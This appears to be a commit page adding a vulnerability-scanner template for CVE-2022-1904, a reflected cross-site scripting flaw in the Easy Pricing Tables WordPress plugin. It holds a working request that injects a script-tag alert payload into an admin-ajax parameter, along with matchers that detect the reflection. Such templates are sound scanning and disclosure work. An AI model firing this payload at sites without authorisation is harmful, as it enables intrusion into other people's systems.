Create CVE-2022-1904.yaml
Prince Chaddha
GitHub
parent
89ca1b1036
commit
2994384003
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2022-1904
|
||||
|
||||
info:
|
||||
name: Easy Pricing Tables < 3.2.1 - Reflected Cross-Site-Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: The plugin does not sanitise and escape parameter before outputting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1904
|
||||
tags: cve,cve2022,wp-plugin,xss,wp,wordpress
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(document.domain)</script> - Color'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
Loading…
Reference in New Issue